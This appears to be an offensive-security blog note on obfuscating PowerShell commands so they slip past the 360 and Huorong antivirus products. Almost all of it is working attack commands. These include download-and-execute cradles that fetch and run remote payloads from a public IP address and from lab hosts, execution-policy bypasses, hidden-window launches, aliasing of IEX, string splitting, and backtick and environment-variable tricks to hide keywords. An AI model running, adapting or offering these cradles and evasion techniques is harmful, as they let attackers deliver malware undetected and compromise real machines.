PowerShell obfuscation for AV evasion -- bypassing 360 and Huorong
Final result
Windows 10
echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10'+'1.34.38.1'+'89/a') | %psmodulepath:~24,10% -
Other Windows versions
echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10'+'1.34.38.1'+'89/a') | powershell -
1. Script on disk
Read the script locally and run it through a pipe
powershell Get-Content 1.ps1 | powershell -NoProfile -
Bypass: the bypass execution policy flag
powershell -ExecutionPolicy bypass -File ./1.ps1
Unrestricted: the unrestricted execution policy flag
powershell -ExecutionPolicy unrestricted -File ./1.ps1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://101.34.38.189:80/a'))"
2. Fileless (nothing written to disk)
1. Set an alias for IEX
iex => Invoke-Expression
set-alias -name hhh -value IEX
powershell set-alias -name hhh -value IEX;hhh(New-Object Net.WebClient).DownloadString('http://192.168.1.1/123.txt')
powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://192.168.10.26:88/a/payload.ps1')
2. Use echo to download the script remotely and run it through IEX
echo Invoke-Expression(new-object net.webclient).downloadstring('http://192.168.10.26:88/a/payload.ps1') | powershell -
3. On Windows 10, slice "powershell" out of an environment variable (on a default install PSModulePath starts with C:\Program Files\WindowsPowerShell\Modules, so offset 24, length 10 yields "PowerShell")
%psmodulepath:~24,10%
4. Variable concatenation
$b1='invoke-Ex';$b2='pression';$a1='((new-object net.webclient).downl';$a2='oadstring(''http://192.168.0.104:80/a''))';$a3=$b1,$b2,$a1,$a2;iex(-join $a3)
5. Combine '+' string concatenation with variable concatenation
powershell "$b='((new-object net.webclient).downlo)';$a='(adstring(http://192.168.1.1/payload.ps1))';IEX ($b+$a)"
6. Insert backticks into names: the PowerShell team chose the backtick as the escape character, so a backtick in front of a letter that is not one of the escapes below is simply ignored
`' single quote
`" double quote
`0 null
`a alert
`b backspace
`f form feed
`n new line
`r carriage return
`t horizontal tab
`v vertical tab
echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10'+'1.34.38.1'+'89/a') | %psmodulepath:~24,10% -
echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10'+'1.34.38.1'+'89/a') | powershell -